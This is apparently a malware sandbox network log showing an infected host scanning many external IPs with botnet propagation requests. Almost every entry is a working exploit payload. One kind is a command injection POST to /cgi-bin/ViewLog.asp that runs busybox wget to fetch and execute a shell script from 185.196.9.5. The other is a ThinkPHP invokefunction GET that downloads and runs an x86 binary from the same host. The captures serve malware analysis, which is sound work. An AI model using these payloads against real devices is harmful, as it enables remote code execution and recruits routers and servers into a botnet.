Feb 25, 2024 19:04:12.598834038 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
728	192.168.2.15	33980	31.136.185.213	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.603646040 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:15.845638037 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:21.989587069 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:34.021275997 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:58.853056908 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:48.004597902 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
729	192.168.2.15	58436	31.136.180.52	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.604270935 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:15.845664024 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:21.989655018 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:34.021399021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:58.853039980 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:48.004756927 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
730	192.168.2.15	41042	94.237.37.235	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.622785091 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
731	192.168.2.15	39190	94.120.99.19	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.646440029 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
732	192.168.2.15	34112	94.120.100.131	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.647727966 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
733	192.168.2.15	50194	62.29.90.100	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.647947073 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
734	192.168.2.15	33756	31.136.74.49	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:12.958216906 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:13.509573936 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:14.629669905 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:16.869563103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:21.477691889 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:30.437386036 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:48.613306046 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:25.476953030 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
735	192.168.2.15	52498	94.122.63.146	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.005487919 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
736	192.168.2.15	51072	94.121.140.27	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.040806055 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
737	192.168.2.15	46732	94.121.116.63	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.044043064 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
738	192.168.2.15	58266	94.120.43.93	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.045612097 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
739	192.168.2.15	36038	95.164.255.242	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.213956118 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:13.312463045 CET	495	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
740	192.168.2.15	56870	95.216.159.133	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.311315060 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:13.507242918 CET	351	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: close X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
741	192.168.2.15	47756	95.86.75.128	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.349854946 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
742	192.168.2.15	47080	95.170.83.83	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.489535093 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:13.665672064 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:26 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

